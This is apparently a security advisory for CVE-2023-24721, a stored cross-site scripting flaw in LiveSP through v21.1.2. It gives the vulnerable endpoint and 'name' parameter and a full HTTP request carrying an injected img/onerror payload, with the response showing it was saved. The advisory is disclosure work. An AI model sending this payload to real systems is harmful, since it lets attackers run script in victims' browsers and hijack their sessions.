CVE-2023-24721: CVE/CVE-2023-24721.md at main · marcovntr/CVE

CVE-2023-24721 - Stored Cross-site Scripting (XSS)

Description

An issue was discovered in LiveSP through v.21.1.2. A malicious user leveraging this vulnerability could inject arbitrary JavaScript code. The malicious payload will then be triggered every time an authenticated user browses the page containing it.

POC

Stored cross-site scripting (also known as second-order or persistent XSS) arises when an application receives data from an untrusted source and includes that data within its later HTTP responses in an unsafe way. The attacker-supplied code can perform a wide variety of actions, such as stealing victims’ session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application’s processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers’ XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

Affected Endpoint

• URL: https://[ip:port]/va/service/bach/topology/element
• HTTP Post Parameter: name

Technical Details

In this specific instance, using the API available under /va/service/bach/topology/element, it is possible to inject arbitrary JavaScript code within the name POST parameter, as shown in the following HTTP Request/Response pair.

HTTP Request:

POST /va/service/bach/topology/element HTTP/1.1 Host: [REDACTED] Cookie: [REDACTED] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: [REDACTED] X-Customer: [REDACTED] Content-Type: application/json Content-Length: 175 Origin: [REDACTED] Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close

{"attributes":{"name":"\"><img src=’x’ onerror=’alert(\"pwned\")'>","extraLabel":""},"type":"cluster","keyType":"cluster:applicationUser","children":{"neType:application":[]}}

HTTP Response:

HTTP/1.1 201 Created Server: [REDACTED] Date: Wed, 04 Jan 2023 13:45:39 GMT Content-Type: application/json Content-Length: 902 Connection: close Access-Control-Allow-Credentials: true Access-Control-Expose-Headers:Accept,Accept-Language,APP-Platform,APP-Version,Content-Disposition,Content-Language,Content-Range,Content-Type,X-Customer,X-Debug,X-MT-Admin,X-UserScope,X-UserToken Access-Control-Allow-Origin: * Referrer-Policy: strict-origin

[…]

As we note from the HTTP Response above, the exploit was successfully saved. At this point, when the user visits the https://[hostname:port]/va/cluster web page, the exploit runs from the victim’s browser.

Reference

• https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24721